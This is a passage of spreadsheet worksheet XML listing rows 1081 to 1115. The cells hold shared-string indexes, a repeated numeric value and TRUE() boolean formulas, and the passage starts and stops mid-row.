      <c r="B1081" t="s">
        <v>0</v>
      </c>
      <c r="C1081" t="s">
        <v>78</v>
      </c>
      <c r="D1081" t="s">
        <v>1296</v>
      </c>
      <c r="E1081" t="s">
        <v>1227</v>
      </c>
      <c r="F1081">
        <v>29117303</v>
      </c>
      <c r="G1081" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1081" t="s">
        <v>1415</v>
      </c>
      <c r="K1081">
        <v>0</v>
      </c>
      <c r="L1081" t="s">
        <v>98</v>
      </c>
      <c r="R1081" t="s">
        <v>5</v>
      </c>
      <c r="S1081" t="s">
        <v>1229</v>
      </c>
      <c r="T1081" t="s">
        <v>7</v>
      </c>
      <c r="U1081" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1082" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1082" s="1">
        <v>17450</v>
      </c>
      <c r="B1082" t="s">
        <v>0</v>
      </c>
      <c r="C1082" t="s">
        <v>78</v>
      </c>
      <c r="D1082" t="s">
        <v>1296</v>
      </c>
      <c r="E1082" t="s">
        <v>1227</v>
      </c>
      <c r="F1082">
        <v>29117303</v>
      </c>
      <c r="G1082" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1082" t="s">
        <v>1416</v>
      </c>
      <c r="K1082">
        <v>0</v>
      </c>
      <c r="L1082" t="s">
        <v>98</v>
      </c>
      <c r="R1082" t="s">
        <v>5</v>
      </c>
      <c r="S1082" t="s">
        <v>1229</v>
      </c>
      <c r="T1082" t="s">
        <v>7</v>
      </c>
      <c r="U1082" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1083" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1083" s="1">
        <v>17451</v>
      </c>
      <c r="B1083" t="s">
        <v>0</v>
      </c>
      <c r="C1083" t="s">
        <v>78</v>
      </c>
      <c r="D1083" t="s">
        <v>1296</v>
      </c>
      <c r="E1083" t="s">
        <v>1227</v>
      </c>
      <c r="F1083">
        <v>29117303</v>
      </c>
      <c r="G1083" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1083" t="s">
        <v>1417</v>
      </c>
      <c r="K1083">
        <v>0</v>
      </c>
      <c r="L1083" t="s">
        <v>98</v>
      </c>
      <c r="R1083" t="s">
        <v>5</v>
      </c>
      <c r="S1083" t="s">
        <v>1229</v>
      </c>
      <c r="T1083" t="s">
        <v>7</v>
      </c>
      <c r="U1083" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1084" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1084" s="1">
        <v>17452</v>
      </c>
      <c r="B1084" t="s">
        <v>0</v>
      </c>
      <c r="C1084" t="s">
        <v>78</v>
      </c>
      <c r="D1084" t="s">
        <v>1296</v>
      </c>
      <c r="E1084" t="s">
        <v>1227</v>
      </c>
      <c r="F1084">
        <v>29117303</v>
      </c>
      <c r="G1084" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1084" t="s">
        <v>1418</v>
      </c>
      <c r="K1084">
        <v>0</v>
      </c>
      <c r="L1084" t="s">
        <v>98</v>
      </c>
      <c r="R1084" t="s">
        <v>5</v>
      </c>
      <c r="S1084" t="s">
        <v>1229</v>
      </c>
      <c r="T1084" t="s">
        <v>7</v>
      </c>
      <c r="U1084" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1085" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1085" s="1">
        <v>17453</v>
      </c>
      <c r="B1085" t="s">
        <v>0</v>
      </c>
      <c r="C1085" t="s">
        <v>78</v>
      </c>
      <c r="D1085" t="s">
        <v>1296</v>
      </c>
      <c r="E1085" t="s">
        <v>1227</v>
      </c>
      <c r="F1085">
        <v>29117303</v>
      </c>
      <c r="G1085" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1085" t="s">
        <v>1419</v>
      </c>
      <c r="K1085">
        <v>0</v>
      </c>
      <c r="L1085" t="s">
        <v>98</v>
      </c>
      <c r="R1085" t="s">
        <v>5</v>
      </c>
      <c r="S1085" t="s">
        <v>1229</v>
      </c>
      <c r="T1085" t="s">
        <v>7</v>
      </c>
      <c r="U1085" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1086" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1086" s="1">
        <v>17454</v>
      </c>
      <c r="B1086" t="s">
        <v>0</v>
      </c>
      <c r="C1086" t="s">
        <v>78</v>
      </c>
      <c r="D1086" t="s">
        <v>1296</v>
      </c>
      <c r="E1086" t="s">
        <v>1227</v>
      </c>
      <c r="F1086">
        <v>29117303</v>
      </c>
      <c r="G1086" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1086" t="s">
        <v>1420</v>
      </c>
      <c r="K1086">
        <v>0</v>
      </c>
      <c r="L1086" t="s">
        <v>98</v>
      </c>
      <c r="R1086" t="s">
        <v>5</v>
      </c>
      <c r="S1086" t="s">
        <v>1229</v>
      </c>
      <c r="T1086" t="s">
        <v>7</v>
      </c>
      <c r="U1086" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1087" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1087" s="1">
        <v>17455</v>
      </c>
      <c r="B1087" t="s">
        <v>0</v>
      </c>
      <c r="C1087" t="s">
        <v>78</v>
      </c>
      <c r="D1087" t="s">
        <v>1296</v>
      </c>
      <c r="E1087" t="s">
        <v>1227</v>
      </c>
      <c r="F1087">
        <v>29117303</v>
      </c>
      <c r="G1087" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1087" t="s">
        <v>1421</v>
      </c>
      <c r="K1087">
        <v>0</v>
      </c>
      <c r="L1087" t="s">
        <v>98</v>
      </c>
      <c r="R1087" t="s">
        <v>5</v>
      </c>
      <c r="S1087" t="s">
        <v>1229</v>
      </c>
      <c r="T1087" t="s">
        <v>7</v>
      </c>
      <c r="U1087" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1088" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1088" s="1">
        <v>17456</v>
      </c>
      <c r="B1088" t="s">
        <v>0</v>
      </c>
      <c r="C1088" t="s">
        <v>78</v>
      </c>
      <c r="D1088" t="s">
        <v>1296</v>
      </c>
      <c r="E1088" t="s">
        <v>1227</v>
      </c>
      <c r="F1088">
        <v>29117303</v>
      </c>
      <c r="G1088" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1088" t="s">
        <v>1422</v>
      </c>
      <c r="K1088">
        <v>0</v>
      </c>
      <c r="L1088" t="s">
        <v>98</v>
      </c>
      <c r="R1088" t="s">
        <v>5</v>
      </c>
      <c r="S1088" t="s">
        <v>1229</v>
      </c>
      <c r="T1088" t="s">
        <v>7</v>
      </c>
      <c r="U1088" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1089" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1089" s="1">
        <v>17457</v>
      </c>
      <c r="B1089" t="s">
        <v>0</v>
      </c>
      <c r="C1089" t="s">
        <v>78</v>
      </c>
      <c r="D1089" t="s">
        <v>1296</v>
      </c>
      <c r="E1089" t="s">
        <v>1227</v>
      </c>
      <c r="F1089">
        <v>29117303</v>
      </c>
      <c r="G1089" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1089" t="s">
        <v>1423</v>
      </c>
      <c r="K1089">
        <v>0</v>
      </c>
      <c r="L1089" t="s">
        <v>98</v>
      </c>
      <c r="R1089" t="s">
        <v>5</v>
      </c>
      <c r="S1089" t="s">
        <v>1229</v>
      </c>
      <c r="T1089" t="s">
        <v>7</v>
      </c>
      <c r="U1089" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1090" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1090" s="1">
        <v>17458</v>
      </c>
      <c r="B1090" t="s">
        <v>0</v>
      </c>
      <c r="C1090" t="s">
        <v>78</v>
      </c>
      <c r="D1090" t="s">
        <v>1296</v>
      </c>
      <c r="E1090" t="s">
        <v>1227</v>
      </c>
      <c r="F1090">
        <v>29117303</v>
      </c>
      <c r="G1090" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1090" t="s">
        <v>1424</v>
      </c>
      <c r="K1090">
        <v>0</v>
      </c>
      <c r="L1090" t="s">
        <v>98</v>
      </c>
      <c r="R1090" t="s">
        <v>5</v>
      </c>
      <c r="S1090" t="s">
        <v>1229</v>
      </c>
      <c r="T1090" t="s">
        <v>7</v>
      </c>
      <c r="U1090" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1091" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1091" s="1">
        <v>17459</v>
      </c>
      <c r="B1091" t="s">
        <v>0</v>
      </c>
      <c r="C1091" t="s">
        <v>78</v>
      </c>
      <c r="D1091" t="s">
        <v>1296</v>
      </c>
      <c r="E1091" t="s">
        <v>1227</v>
      </c>
      <c r="F1091">
        <v>29117303</v>
      </c>
      <c r="G1091" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1091" t="s">
        <v>1425</v>
      </c>
      <c r="K1091">
        <v>0</v>
      </c>
      <c r="L1091" t="s">
        <v>98</v>
      </c>
      <c r="R1091" t="s">
        <v>5</v>
      </c>
      <c r="S1091" t="s">
        <v>1229</v>
      </c>
      <c r="T1091" t="s">
        <v>7</v>
      </c>
      <c r="U1091" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1092" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1092" s="1">
        <v>17460</v>
      </c>
      <c r="B1092" t="s">
        <v>0</v>
      </c>
      <c r="C1092" t="s">
        <v>78</v>
      </c>
      <c r="D1092" t="s">
        <v>1296</v>
      </c>
      <c r="E1092" t="s">
        <v>1227</v>
      </c>
      <c r="F1092">
        <v>29117303</v>
      </c>
      <c r="G1092" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1092" t="s">
        <v>1426</v>
      </c>
      <c r="K1092">
        <v>0</v>
      </c>
      <c r="L1092" t="s">
        <v>98</v>
      </c>
      <c r="R1092" t="s">
        <v>5</v>
      </c>
      <c r="S1092" t="s">
        <v>1229</v>
      </c>
      <c r="T1092" t="s">
        <v>7</v>
      </c>
      <c r="U1092" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1093" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1093" s="1">
        <v>17461</v>
      </c>
      <c r="B1093" t="s">
        <v>0</v>
      </c>
      <c r="C1093" t="s">
        <v>78</v>
      </c>
      <c r="D1093" t="s">
        <v>1296</v>
      </c>
      <c r="E1093" t="s">
        <v>1227</v>
      </c>
      <c r="F1093">
        <v>29117303</v>
      </c>
      <c r="G1093" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1093" t="s">
        <v>1427</v>
      </c>
      <c r="K1093">
        <v>0</v>
      </c>
      <c r="L1093" t="s">
        <v>98</v>
      </c>
      <c r="R1093" t="s">
        <v>5</v>
      </c>
      <c r="S1093" t="s">
        <v>1229</v>
      </c>
      <c r="T1093" t="s">
        <v>7</v>
      </c>
      <c r="U1093" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1094" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1094" s="1">
        <v>17462</v>
      </c>
      <c r="B1094" t="s">
        <v>0</v>
      </c>
      <c r="C1094" t="s">
        <v>78</v>
      </c>
      <c r="D1094" t="s">
        <v>1296</v>
      </c>
      <c r="E1094" t="s">
        <v>1227</v>
      </c>
      <c r="F1094">
        <v>29117303</v>
      </c>
      <c r="G1094" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1094" t="s">
        <v>1428</v>
      </c>
      <c r="K1094">
        <v>0</v>
      </c>
      <c r="L1094" t="s">
        <v>98</v>
      </c>
      <c r="R1094" t="s">
        <v>5</v>
      </c>
      <c r="S1094" t="s">
        <v>1229</v>
      </c>
      <c r="T1094" t="s">
        <v>7</v>
      </c>
      <c r="U1094" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1095" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1095" s="1">
        <v>17463</v>
      </c>
      <c r="B1095" t="s">
        <v>0</v>
      </c>
      <c r="C1095" t="s">
        <v>78</v>
      </c>
      <c r="D1095" t="s">
        <v>1296</v>
      </c>
      <c r="E1095" t="s">
        <v>1227</v>
      </c>
      <c r="F1095">
        <v>29117303</v>
      </c>
      <c r="G1095" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1095" t="s">
        <v>1429</v>
      </c>
      <c r="K1095">
        <v>0</v>
      </c>
      <c r="L1095" t="s">
        <v>98</v>
      </c>
      <c r="R1095" t="s">
        <v>5</v>
      </c>
      <c r="S1095" t="s">
        <v>1229</v>
      </c>
      <c r="T1095" t="s">
        <v>7</v>
      </c>
      <c r="U1095" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1096" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1096" s="1">
        <v>17464</v>
      </c>
      <c r="B1096" t="s">
        <v>0</v>
      </c>
      <c r="C1096" t="s">
        <v>78</v>
      </c>
      <c r="D1096" t="s">
        <v>1296</v>
      </c>
      <c r="E1096" t="s">
        <v>1227</v>
      </c>
      <c r="F1096">
        <v>29117303</v>
      </c>
      <c r="G1096" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1096" t="s">
        <v>1430</v>
      </c>
      <c r="K1096">
        <v>0</v>
      </c>
      <c r="L1096" t="s">
        <v>98</v>
      </c>
      <c r="R1096" t="s">
        <v>5</v>
      </c>
      <c r="S1096" t="s">
        <v>1229</v>
      </c>
      <c r="T1096" t="s">
        <v>7</v>
      </c>
      <c r="U1096" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1097" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1097" s="1">
        <v>17465</v>
      </c>
      <c r="B1097" t="s">
        <v>0</v>
      </c>
      <c r="C1097" t="s">
        <v>78</v>
      </c>
      <c r="D1097" t="s">
        <v>1296</v>
      </c>
      <c r="E1097" t="s">
        <v>1227</v>
      </c>
      <c r="F1097">
        <v>29117303</v>
      </c>
      <c r="G1097" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1097" t="s">
        <v>1431</v>
      </c>
      <c r="K1097">
        <v>0</v>
      </c>
      <c r="L1097" t="s">
        <v>98</v>
      </c>
      <c r="R1097" t="s">
        <v>5</v>
      </c>
      <c r="S1097" t="s">
        <v>1229</v>
      </c>
      <c r="T1097" t="s">
        <v>7</v>
      </c>
      <c r="U1097" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1098" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1098" s="1">
        <v>17466</v>
      </c>
      <c r="B1098" t="s">
        <v>0</v>
      </c>
      <c r="C1098" t="s">
        <v>78</v>
      </c>
      <c r="D1098" t="s">
        <v>1296</v>
      </c>
      <c r="E1098" t="s">
        <v>1227</v>
      </c>
      <c r="F1098">
        <v>29117303</v>
      </c>
      <c r="G1098" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1098" t="s">
        <v>1432</v>
      </c>
      <c r="K1098">
        <v>0</v>
      </c>
      <c r="L1098" t="s">
        <v>98</v>
      </c>
      <c r="R1098" t="s">
        <v>5</v>
      </c>
      <c r="S1098" t="s">
        <v>1229</v>
      </c>
      <c r="T1098" t="s">
        <v>7</v>
      </c>
      <c r="U1098" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1099" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1099" s="1">
        <v>17467</v>
      </c>
      <c r="B1099" t="s">
        <v>0</v>
      </c>
      <c r="C1099" t="s">
        <v>78</v>
      </c>
      <c r="D1099" t="s">
        <v>1296</v>
      </c>
      <c r="E1099" t="s">
        <v>1227</v>
      </c>
      <c r="F1099">
        <v>29117303</v>
      </c>
      <c r="G1099" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1099" t="s">
        <v>1433</v>
      </c>
      <c r="K1099">
        <v>0</v>
      </c>
      <c r="L1099" t="s">
        <v>98</v>
      </c>
      <c r="R1099" t="s">
        <v>5</v>
      </c>
      <c r="S1099" t="s">
        <v>1229</v>
      </c>
      <c r="T1099" t="s">
        <v>7</v>
      </c>
      <c r="U1099" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1100" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1100" s="1">
        <v>17468</v>
      </c>
      <c r="B1100" t="s">
        <v>0</v>
      </c>
      <c r="C1100" t="s">
        <v>78</v>
      </c>
      <c r="D1100" t="s">
        <v>1296</v>
      </c>
      <c r="E1100" t="s">
        <v>1227</v>
      </c>
      <c r="F1100">
        <v>29117303</v>
      </c>
      <c r="G1100" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1100" t="s">
        <v>1434</v>
      </c>
      <c r="K1100">
        <v>0</v>
      </c>
      <c r="L1100" t="s">
        <v>98</v>
      </c>
      <c r="R1100" t="s">
        <v>5</v>
      </c>
      <c r="S1100" t="s">
        <v>1229</v>
      </c>
      <c r="T1100" t="s">
        <v>7</v>
      </c>
      <c r="U1100" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1101" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1101" s="1">
        <v>17469</v>
      </c>
      <c r="B1101" t="s">
        <v>0</v>
      </c>
      <c r="C1101" t="s">
        <v>78</v>
      </c>
      <c r="D1101" t="s">
        <v>1296</v>
      </c>
      <c r="E1101" t="s">
        <v>1227</v>
      </c>
      <c r="F1101">
        <v>29117303</v>
      </c>
      <c r="G1101" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1101" t="s">
        <v>1435</v>
      </c>
      <c r="K1101">
        <v>0</v>
      </c>
      <c r="L1101" t="s">
        <v>98</v>
      </c>
      <c r="R1101" t="s">
        <v>5</v>
      </c>
      <c r="S1101" t="s">
        <v>1229</v>
      </c>
      <c r="T1101" t="s">
        <v>7</v>
      </c>
      <c r="U1101" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1102" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1102" s="1">
        <v>17470</v>
      </c>
      <c r="B1102" t="s">
        <v>0</v>
      </c>
      <c r="C1102" t="s">
        <v>78</v>
      </c>
      <c r="D1102" t="s">
        <v>1296</v>
      </c>
      <c r="E1102" t="s">
        <v>1227</v>
      </c>
      <c r="F1102">
        <v>29117303</v>
      </c>
      <c r="G1102" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1102" t="s">
        <v>1436</v>
      </c>
      <c r="K1102">
        <v>0</v>
      </c>
      <c r="L1102" t="s">
        <v>98</v>
      </c>
      <c r="R1102" t="s">
        <v>5</v>
      </c>
      <c r="S1102" t="s">
        <v>1229</v>
      </c>
      <c r="T1102" t="s">
        <v>7</v>
      </c>
      <c r="U1102" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1103" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1103" s="1">
        <v>17471</v>
      </c>
      <c r="B1103" t="s">
        <v>0</v>
      </c>
      <c r="C1103" t="s">
        <v>78</v>
      </c>
      <c r="D1103" t="s">
        <v>1296</v>
      </c>
      <c r="E1103" t="s">
        <v>1227</v>
      </c>
      <c r="F1103">
        <v>29117303</v>
      </c>
      <c r="G1103" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1103" t="s">
        <v>1437</v>
      </c>
      <c r="K1103">
        <v>0</v>
      </c>
      <c r="L1103" t="s">
        <v>98</v>
      </c>
      <c r="R1103" t="s">
        <v>5</v>
      </c>
      <c r="S1103" t="s">
        <v>1229</v>
      </c>
      <c r="T1103" t="s">
        <v>7</v>
      </c>
      <c r="U1103" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1104" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1104" s="1">
        <v>17472</v>
      </c>
      <c r="B1104" t="s">
        <v>0</v>
      </c>
      <c r="C1104" t="s">
        <v>78</v>
      </c>
      <c r="D1104" t="s">
        <v>1296</v>
      </c>
      <c r="E1104" t="s">
        <v>1227</v>
      </c>
      <c r="F1104">
        <v>29117303</v>
      </c>
      <c r="G1104" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1104" t="s">
        <v>1438</v>
      </c>
      <c r="K1104">
        <v>0</v>
      </c>
      <c r="L1104" t="s">
        <v>98</v>
      </c>
      <c r="R1104" t="s">
        <v>5</v>
      </c>
      <c r="S1104" t="s">
        <v>1229</v>
      </c>
      <c r="T1104" t="s">
        <v>7</v>
      </c>
      <c r="U1104" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1105" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1105" s="1">
        <v>17473</v>
      </c>
      <c r="B1105" t="s">
        <v>0</v>
      </c>
      <c r="C1105" t="s">
        <v>78</v>
      </c>
      <c r="D1105" t="s">
        <v>1296</v>
      </c>
      <c r="E1105" t="s">
        <v>1227</v>
      </c>
      <c r="F1105">
        <v>29117303</v>
      </c>
      <c r="G1105" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1105" t="s">
        <v>1439</v>
      </c>
      <c r="K1105">
        <v>0</v>
      </c>
      <c r="L1105" t="s">
        <v>98</v>
      </c>
      <c r="R1105" t="s">
        <v>5</v>
      </c>
      <c r="S1105" t="s">
        <v>1229</v>
      </c>
      <c r="T1105" t="s">
        <v>7</v>
      </c>
      <c r="U1105" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1106" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1106" s="1">
        <v>17474</v>
      </c>
      <c r="B1106" t="s">
        <v>0</v>
      </c>
      <c r="C1106" t="s">
        <v>78</v>
      </c>
      <c r="D1106" t="s">
        <v>1296</v>
      </c>
      <c r="E1106" t="s">
        <v>1227</v>
      </c>
      <c r="F1106">
        <v>29117303</v>
      </c>
      <c r="G1106" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1106" t="s">
        <v>1440</v>
      </c>
      <c r="K1106">
        <v>0</v>
      </c>
      <c r="L1106" t="s">
        <v>98</v>
      </c>
      <c r="R1106" t="s">
        <v>5</v>
      </c>
      <c r="S1106" t="s">
        <v>1229</v>
      </c>
      <c r="T1106" t="s">
        <v>7</v>
      </c>
      <c r="U1106" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1107" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1107" s="1">
        <v>17475</v>
      </c>
      <c r="B1107" t="s">
        <v>0</v>
      </c>
      <c r="C1107" t="s">
        <v>78</v>
      </c>
      <c r="D1107" t="s">
        <v>1296</v>
      </c>
      <c r="E1107" t="s">
        <v>1227</v>
      </c>
      <c r="F1107">
        <v>29117303</v>
      </c>
      <c r="G1107" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1107" t="s">
        <v>1441</v>
      </c>
      <c r="K1107">
        <v>0</v>
      </c>
      <c r="L1107" t="s">
        <v>98</v>
      </c>
      <c r="R1107" t="s">
        <v>5</v>
      </c>
      <c r="S1107" t="s">
        <v>1229</v>
      </c>
      <c r="T1107" t="s">
        <v>7</v>
      </c>
      <c r="U1107" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1108" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1108" s="1">
        <v>17476</v>
      </c>
      <c r="B1108" t="s">
        <v>0</v>
      </c>
      <c r="C1108" t="s">
        <v>78</v>
      </c>
      <c r="D1108" t="s">
        <v>1296</v>
      </c>
      <c r="E1108" t="s">
        <v>1227</v>
      </c>
      <c r="F1108">
        <v>29117303</v>
      </c>
      <c r="G1108" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1108" t="s">
        <v>1442</v>
      </c>
      <c r="K1108">
        <v>0</v>
      </c>
      <c r="L1108" t="s">
        <v>98</v>
      </c>
      <c r="R1108" t="s">
        <v>5</v>
      </c>
      <c r="S1108" t="s">
        <v>1229</v>
      </c>
      <c r="T1108" t="s">
        <v>7</v>
      </c>
      <c r="U1108" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1109" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1109" s="1">
        <v>17477</v>
      </c>
      <c r="B1109" t="s">
        <v>0</v>
      </c>
      <c r="C1109" t="s">
        <v>78</v>
      </c>
      <c r="D1109" t="s">
        <v>1296</v>
      </c>
      <c r="E1109" t="s">
        <v>1227</v>
      </c>
      <c r="F1109">
        <v>29117303</v>
      </c>
      <c r="G1109" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1109" t="s">
        <v>1443</v>
      </c>
      <c r="K1109">
        <v>0</v>
      </c>
      <c r="L1109" t="s">
        <v>98</v>
      </c>
      <c r="R1109" t="s">
        <v>5</v>
      </c>
      <c r="S1109" t="s">
        <v>1229</v>
      </c>
      <c r="T1109" t="s">
        <v>7</v>
      </c>
      <c r="U1109" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1110" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1110" s="1">
        <v>17478</v>
      </c>
      <c r="B1110" t="s">
        <v>0</v>
      </c>
      <c r="C1110" t="s">
        <v>78</v>
      </c>
      <c r="D1110" t="s">
        <v>1296</v>
      </c>
      <c r="E1110" t="s">
        <v>1227</v>
      </c>
      <c r="F1110">
        <v>29117303</v>
      </c>
      <c r="G1110" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1110" t="s">
        <v>1444</v>
      </c>
      <c r="K1110">
        <v>0</v>
      </c>
      <c r="L1110" t="s">
        <v>98</v>
      </c>
      <c r="R1110" t="s">
        <v>5</v>
      </c>
      <c r="S1110" t="s">
        <v>1229</v>
      </c>
      <c r="T1110" t="s">
        <v>7</v>
      </c>
      <c r="U1110" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1111" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1111" s="1">
        <v>17479</v>
      </c>
      <c r="B1111" t="s">
        <v>0</v>
      </c>
      <c r="C1111" t="s">
        <v>78</v>
      </c>
      <c r="D1111" t="s">
        <v>1296</v>
      </c>
      <c r="E1111" t="s">
        <v>1227</v>
      </c>
      <c r="F1111">
        <v>29117303</v>
      </c>
      <c r="G1111" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1111" t="s">
        <v>1445</v>
      </c>
      <c r="K1111">
        <v>0</v>
      </c>
      <c r="L1111" t="s">
        <v>98</v>
      </c>
      <c r="R1111" t="s">
        <v>5</v>
      </c>
      <c r="S1111" t="s">
        <v>1229</v>
      </c>
      <c r="T1111" t="s">
        <v>7</v>
      </c>
      <c r="U1111" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1112" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1112" s="1">
        <v>17480</v>
      </c>
      <c r="B1112" t="s">
        <v>0</v>
      </c>
      <c r="C1112" t="s">
        <v>78</v>
      </c>
      <c r="D1112" t="s">
        <v>1296</v>
      </c>
      <c r="E1112" t="s">
        <v>1227</v>
      </c>
      <c r="F1112">
        <v>29117303</v>
      </c>
      <c r="G1112" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1112" t="s">
        <v>1446</v>
      </c>
      <c r="K1112">
        <v>0</v>
      </c>
      <c r="L1112" t="s">
        <v>98</v>
      </c>
      <c r="R1112" t="s">
        <v>5</v>
      </c>
      <c r="S1112" t="s">
        <v>1229</v>
      </c>
      <c r="T1112" t="s">
        <v>7</v>
      </c>
      <c r="U1112" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1113" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1113" s="1">
        <v>17481</v>
      </c>
      <c r="B1113" t="s">
        <v>0</v>
      </c>
      <c r="C1113" t="s">
        <v>78</v>
      </c>
      <c r="D1113" t="s">
        <v>1296</v>
      </c>
      <c r="E1113" t="s">
        <v>1227</v>
      </c>
      <c r="F1113">
        <v>29117303</v>
      </c>
      <c r="G1113" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1113" t="s">
        <v>1447</v>
      </c>
      <c r="K1113">
        <v>0</v>
      </c>
      <c r="L1113" t="s">
        <v>98</v>
      </c>
      <c r="R1113" t="s">
        <v>5</v>
      </c>
      <c r="S1113" t="s">
        <v>1229</v>
      </c>
      <c r="T1113" t="s">
        <v>7</v>
      </c>
      <c r="U1113" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1114" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1114" s="1">
        <v>17482</v>
      </c>
      <c r="B1114" t="s">
        <v>0</v>
      </c>
      <c r="C1114" t="s">
        <v>78</v>
      </c>
      <c r="D1114" t="s">
        <v>1296</v>
      </c>
      <c r="E1114" t="s">
        <v>1227</v>
      </c>
      <c r="F1114">
        <v>29117303</v>
      </c>
      <c r="G1114" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1114" t="s">
        <v>1448</v>
      </c>
      <c r="K1114">
        <v>0</v>
      </c>
      <c r="L1114" t="s">
        <v>98</v>
      </c>
      <c r="R1114" t="s">
        <v>5</v>
      </c>
      <c r="S1114" t="s">
        <v>1229</v>
      </c>
      <c r="T1114" t="s">
        <v>7</v>
      </c>
      <c r="U1114" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1115" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1115" s="1">
        <v>17483</v>
      </c>
      <c r="B1115" t="s">
        <v>0</v>
      </c>
